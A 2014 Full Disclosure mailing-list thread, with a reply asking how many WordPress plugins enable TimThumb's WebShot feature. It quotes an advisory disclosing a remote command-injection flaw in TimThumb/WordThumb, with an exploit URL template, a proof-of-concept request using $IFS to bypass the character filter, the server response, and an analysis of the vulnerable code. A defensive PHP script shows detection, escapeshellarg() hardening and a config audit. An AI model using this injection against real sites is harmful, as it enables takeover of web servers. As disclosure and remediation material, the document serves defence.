Message-ID: <CAHw3cgRRFobdH_jcwFVMRMhDrFwJt9owmb8d1K7GzOc55aEOsQ@mail.gmail.com>
Date: Tue, 24 Jun 2014 21:12:26 +0200
From: Ryan Dewhurst <ryandewhurst@...il.com>
To: Pichaya Morimoto <pichaya@...e.org>
Cc: fulldisclosure@...lists.org,
	full-disclosure <full-disclosure@...ts.grok.org.uk>, submit@...sec.com
Subject: Re: [FD] Wordpress TimThumb 2.8.13 WebShot Remote Code Execution
	(0-day)

Not had a chance to look into it in any depth, but you said that webshot needs
to be enabled for the exploit to work and you also said that
the wordpress-gallery-plugin was vulnerable.

Looking at wordpress-gallery-plugin's repository it seems webshot is
disabled in their timthumb file:

https://github.com/wp-plugins/wordpress-gallery-plugin/blob/37e60d5b7fd1ed3779b82618c5098d459bc8c056/timthumb.php#L114

A quick search on GitHub for the WEBSHOT_ENABLED constant being set to true
doesn't yield many results:

https://github.com/search?q=%22define+%28%27WEBSHOT_ENABLED%27%2C+true%29%3B%22&type=Code&ref=searchresults

I wonder how many WordPress 'assets' (plugins/themes) are affected by this.


On Tue, Jun 24, 2014 at 10:24 AM, Pichaya Morimoto <pichaya@...e.org> wrote:

> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA512
>
> ######################################################################
> #  _     ___  _   _  ____  ____    _  _____
> #  | |   / _ \| \ | |/ ___|/ ___|  / \|_   _|
> #  | |  | | | |  \| | |  _| |     / _ \ | |
> #  | |__| |_| | |\  | |_| | |___ / ___ \| |
> #  |_____\___/|_| \_|\____|\____/_/   \_\_|
> #
> # Wordpress TimThumb 2.8.13 WebShot Remote Code Execution (0-day)
> # Affected website : a lot of WordPress Themes, Plugins, 3rd party components
> # Exploit Author : @u0x (Pichaya Morimoto)
> # Release dates : June 24, 2014
> #
> # Special Thanks to 2600 Thailand group
> # : Xelenonz, anidear, windows98se, icheernoom, w4x0r, pistachio
> # https://www.facebook.com/groups/2600Thailand/ , http://2600.in.th/
> #
> ########################################################################
>
> [+] Description
> ============================================================
> TimThumb is a small php script for cropping, zooming and resizing web
> images (jpg, png, gif). Perfect for use on blogs and other applications.
> Developed for use in the WordPress theme Mimbo Pro, and since used in many
> other WordPress themes.
>
> http://www.binarymoon.co.uk/projects/timthumb/
> https://code.google.com/p/timthumb/
>
> The original project WordThumb 1.07 is also vulnerable (
> https://code.google.com/p/wordthumb/)
> They both shared exactly the same WebShot code! And there are several
> projects that shipped with "timthumb.php", such as,
> Wordpress Gallery Plugin
> https://wordpress.org/plugins/wordpress-gallery-plugin/
> IGIT Posts Slider Widget
> http://wordpress.org/plugins/igit-posts-slider-widget/
>
> All themes from http://themify.me/ contain vulnerable "wordthumb" in
> "<theme-name>/themify/img.php".
>
> [+] Exploit
> ============================================================
> http://<wp-website>/wp-content/themes/<wp-theme>/path/to/timthumb.php?webshot=1&src=http://<wp-website>$(<os-cmds>)
>
> ** Note that the OS command payload MUST be within the following character set:
> [A-Za-z0-9\-\.\_\~:\/\?\#\[\]\@\!\$\&\'\(\)\*\+\,\;\=]
>
> ** Spaces, Pipe, GT sign are not allowed.
> ** This WebShot feature is DISABLED by default.
> ** CutyCapt and XVFB must be installed in constants.
>
> [+] Proof-of-Concept
> ============================================================
> There are a couple of techniques that can be used to bypass limited charsets, but
> I will use the shell variable $IFS instead of a space in this scenario.
>
> PoC Environment:
> Ubuntu 14.04 LTS
> PHP 5.5.9
> Wordpress 3.9.1
> Themify Parallax Theme 1.5.2
> WordThumb 1.07
>
> Crafted Exploit:
>
> http://loncatlab.local/wp-content/themes/parallax/themify/img.php?webshot=1&src=http://loncatlab.local/$(touch$IFS/tmp/longcat)
>
> GET /wp-content/themes/parallax/themify/img.php?webshot=1&src=http://longcatlab.local/$(touch$IFS/tmp/longcat) HTTP/1.1
> Host: longcatlab.local
> Proxy-Connection: keep-alive
> Cache-Control: max-age=0
> Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
> User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like
> Gecko) Chrome/35.0.1916.153 Safari/537.36
> Accept-Encoding: gzip,deflate,sdch
> Accept-Language: en-US,en;q=0.8
> Cookie: woocommerce_recently_viewed=9%7C12%7C16; wp-settings-1=libraryContent%3Dbrowse%26editor%3Dtinymce; wp-settings-time-1=1403504538; themify-builder-tabs=query-portfoliot; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_26775808be2a17b15cf43dfee3a681c9=moderator%7C1403747599%7C62244ce3918e23df1bd22450b3d78685
>
> HTTP/1.1 400 Bad Request
> Date: Tue, 24 Jun 2014 07:20:48 GMT
> Server: Apache
> X-Powered-By: PHP/5.5.9-1ubuntu4
> X-Content-Type-Options: nosniff
> X-Frame-Options: sameorigin
> Content-Length: 3059
> Connection: close
> Content-Type: text/html
>
> …
> <a href='http://www.php.net/function.getimagesize'
> target='_new'>getimagesize</a>
> (  )</td><td
>
> title='/var/www/longcatlab.local/public_html/wp-content/themes/parallax/themify/img.php'
> bgcolor='#eeeeec'>../img.php<b>:</b>388</td></tr>
> </table></font>
> <h1>A WordThumb error has occured</h1>The following error(s) occured:<br
> /><ul><li>The image being resized is not a valid gif, jpg or
> png.</li></ul><br /><br />Query String : webshot=1&amp;src=
> http://longcatlab.local/$(touch$IFS/tmp/longcat)<br />WordThumb version :
> 1.07</pre>
>
> Even though it responds with error messages, the injected OS command has already
> been executed.
>
> $ ls /tmp/longcat -lha
> - -rw-r--r-- 1 www-data www-data 0 มิ.ย.  24 14:20 /tmp/longcat
>
>
> [+] Vulnerability Analysis
> ============================================================
> https://timthumb.googlecode.com/svn/trunk/timthumb.php
>
> Filename: timthumb.php
>
> if(! defined('WEBSHOT_ENABLED') ) define ('WEBSHOT_ENABLED', true);
> if(! defined('WEBSHOT_CUTYCAPT') ) define ('WEBSHOT_CUTYCAPT', '/usr/local/bin/CutyCapt');
> if(! defined('WEBSHOT_XVFB') ) define ('WEBSHOT_XVFB', '/usr/bin/xvfb-run');
> ...
> timthumb::start(); ← start script
> ...
> public static function start(){
> $tim = new timthumb(); ← create timthumb object, call __construct()
> ...
> $tim->run();
> ...
> public function __construct(){
> ...
> $this->src = $this->param('src'); ← set "src" variable to the HTTP GET "src" parameter
> …
> if(preg_match('/^https?:\/\/[^\/]+/i', $this->src)){
> ...
> $this->isURL = true; ← prefix http/s result in isURL = true
> }
> ...
>
> protected function param($property, $default = ''){
> if (isset ($_GET[$property])) {
> return $_GET[$property];
> ...
>
> public function run(){
> if($this->isURL){
> ...
> if($this->param('webshot')){ ← HTTP GET "webshot" must be submitted
> if(WEBSHOT_ENABLED){ ← this pre-defined constant must be true
> ...
> $this->serveWebshot(); ← call webshot feature
> } else {
> ...
>
> protected function serveWebshot(){
> ...
> if(! is_file(WEBSHOT_CUTYCAPT)){ ← check that CutyCapt exists
> return $this->error("CutyCapt is not installed. $instr");
> }
> if(! is_file(WEBSHOT_XVFB)){ ← check that Xvfb exists
> return $this->Error("Xvfb is not installed. $instr");
> }
> ...
> $url = $this->src;
> if(! preg_match('/^https?:\/\/[a-zA-Z0-9\.\-]+/i', $url)){ ← check for a valid URL #LoL
> return $this->error("Invalid URL supplied.");
> }
> $url = preg_replace('/[^A-Za-z0-9\-\.\_\~:\/\?\#\[\]\@\!\$\&\'\(\)\*\+\,\;\=]+/', '', $url); ← strip characters outside the URL set specified in RFC 3986
> http://www.ietf.org/rfc/rfc3986.txt
> ...
> if(WEBSHOT_XVFB_RUNNING){
> putenv('DISPLAY=:100.0');
> $command = "$cuty $proxy --max-wait=$timeout --user-agent=\"$ua\"
> --javascript=$jsOn --java=$javaOn --plugins=$pluginsOn
> --js-can-open-windows=off --url=\"$url\" --out-format=$format
> --out=$tempfile"; ← OS shell command injection
> } else {
> $command = "$xv --server-args=\"-screen 0,
> {$screenX}x{$screenY}x{$colDepth}\" $cuty $proxy --max-wait=$timeout
> --user-agent=\"$ua\" --javascript=$jsOn --java=$javaOn --plugins=$pluginsOn
> --js-can-open-windows=off --url=\"$url\" --out-format=$format
> --out=$tempfile"; ← OS shell command injection
> }
> ...
> $out = `$command`;  ← execute $command as shell command
>
> "PHP supports one execution operator: backticks (``). Note that these are
> not single-quotes! PHP will attempt to execute the contents of the
> backticks as a shell command." -
> http://www.php.net//manual/en/language.operators.execution.php
>
> "$url" fails to escape "$()" in "$command", which results in arbitrary
> code execution.
> -----BEGIN PGP SIGNATURE-----
> Version: GnuPG v1
>
> iQIcBAEBCgAGBQJTqTTsAAoJEB2kHapd1XMUy+cP/2ulCS1R8bXDda7R0PIfn9g9
> FEECoLFV2tav1mSnWzuccvWA3vl3g8SUv/Y7GCKs824GVauhcestUUCpVKdCS3Gu
> 8ypfXOdecE+8ykoPhWfj2FWcKNpXTdCoMz8TugVkNM3+SS0akWYWqHeamXCqc3SK
> ZAiKfYQZ/jvVRRo8n/AAWYv5e8hZLmE6qiLGdTFrsH7VtkABIM5lc88o8qg6RU5x
> zg87khZxU+HtJdzN/gH0X6DL7+NJe6HOqun/+V8pm/5JEDUSpiWZIM1xpyIY6GqW
> UnU25UkSt1u+PnLX7KhqxUANU230BY9Ny7BIhp/q1iRvrKTIHK0WYEL3M96YOND2
> +o2YJthfL7zm9k8XMoF2GQaaeqAnWjGmQC9Oo4ogF57X0Qzb1mwUd01db/R5fgPf
> 9IILnpWV2KLq57R3sdVesriEhTNW34Cqf77wS3P5Y5o2csbFL0OspulOVPM1uJTp
> S1sjuEL5gK3nJqzo7K2ihxdmm3o2hA9QXyn8GjTRu6ESZ26hSZgUEyC6P26yAt0Y
> IHuqML3y9guC720BkNoc1gZZNejgqGHUdc6EXzqO9njZFx5DPtDtf3M0f6uZfH/C
> knB9E32Lo9EFu2S/bjblgOQQUPNtKRNURpsGArx2eilPMdThGLZANFPIzvxYSlrz
> cnw4vN4tY8POL5FF7+gF
> =jAL1
> -----END PGP SIGNATURE-----
>
> _______________________________________________
> Sent through the Full Disclosure mailing list
> http://nmap.org/mailman/listinfo/fulldisclosure
> Web Archives & RSS: http://seclists.org/fulldisclosure/
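The following PHP script is an added example, not code from TimThumb, WordThumb or the advisory above. It reproduces the allowlist regex quoted in the analysis to show why a set of characters that are valid in a URL is not a set of characters that are safe in a shell command, flags src values that still contain shell substitution syntax, contrasts the vulnerable double-quoted interpolation with escapeshellarg(), and includes a small helper for the question raised in the reply: what a given timthumb.php or img.php copy defines WEBSHOT_ENABLED as. The CutyCapt path, the example.invalid URL and the two file-content strings are constructed placeholders.

```php
<?php
// Added example for this thread (not TimThumb's or WordThumb's own code).
// It reproduces the advisory's character filter, shows the detection check
// and the fix a maintainer would apply, and audits WEBSHOT_ENABLED in a copy
// of the script. CutyCapt path and sample URL are placeholders.

// Allowlist regex exactly as quoted from serveWebshot() in the advisory.
const RFC3986_STRIP = '/[^A-Za-z0-9\-\.\_\~:\/\?\#\[\]\@\!\$\&\'\(\)\*\+\,\;\=]+/';

// Shell substitution syntax that survives that filter: $(...), backticks,
// ${...} and bare $NAME variable references (the advisory's $IFS trick).
const SHELL_EXPANSION = '/\$\(|`|\$\{|\$[A-Za-z_]/';

// Same transformation TimThumb applies before building the command.
function rfc3986Filter($url) {
    return preg_replace(RFC3986_STRIP, '', $url);
}

// Detection: flag (and log) a src value that still carries shell syntax.
// This is a heuristic for monitoring, not a replacement for escaping.
function hasShellExpansion($url) {
    return preg_match(SHELL_EXPANSION, $url) === 1;
}

// Vulnerable construction, mirroring serveWebshot(): $url is interpolated
// inside double quotes, which the shell still expands.
function buildCommandVulnerable($cuty, $url, $out) {
    return "$cuty --url=\"$url\" --out=$out";
}

// Hardened construction: each untrusted value goes through escapeshellarg(),
// which single-quotes it so $(...) and friends reach CutyCapt literally.
function buildCommandSafe($cuty, $url, $out) {
    return escapeshellarg($cuty)
        . ' --url=' . escapeshellarg($url)
        . ' --out=' . escapeshellarg($out);
}

// Audit helper for the question raised in the reply: what does a given
// timthumb.php / img.php copy define WEBSHOT_ENABLED as? Returns true or
// false for the first define() found, or null when the file never sets it.
function webshotSetting($phpSource) {
    $re = '/define\s*\(\s*[\'"]WEBSHOT_ENABLED[\'"]\s*,\s*(true|false)\s*\)/i';
    if (preg_match($re, $phpSource, $m)) {
        return strtolower($m[1]) === 'true';
    }
    return null;
}

// Constructed input: the advisory's payload shape with a harmless command.
$payload  = 'http://example.invalid/$(id)';
$filtered = rfc3986Filter($payload);

printf("after filter : %s\n", $filtered);
printf("unchanged    : %s\n", $filtered === $payload ? 'yes' : 'no');
printf("flagged      : %s\n", hasShellExpansion($filtered) ? 'yes' : 'no');
printf("vulnerable   : %s\n", buildCommandVulnerable('/usr/local/bin/CutyCapt', $filtered, '/tmp/shot.png'));
printf("hardened     : %s\n", buildCommandSafe('/usr/local/bin/CutyCapt', $filtered, '/tmp/shot.png'));

// Constructed file contents: the default line from timthumb.php quoted in
// the advisory, and a theme wrapper that turns the feature off before
// including it. In a real audit, read each timthumb.php / img.php from disk.
$defaultCopy  = "if(! defined('WEBSHOT_ENABLED') ) define ('WEBSHOT_ENABLED', true);";
$hardenedCopy = "define('WEBSHOT_ENABLED', false);\nrequire 'timthumb.php';";
var_dump(webshotSetting($defaultCopy), webshotSetting($hardenedCopy));
```

Run it with `php` from the command line. The filtered payload comes out identical to the input, because every character of `$(id)` is in the RFC 3986 set; the hardened command line carries it inside single quotes, where the shell performs no substitution. Since PHP 7.4, proc_open() also accepts the command as an array of arguments, which avoids the shell altogether and is the stronger option when CutyCapt's arguments are assembled from request data.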
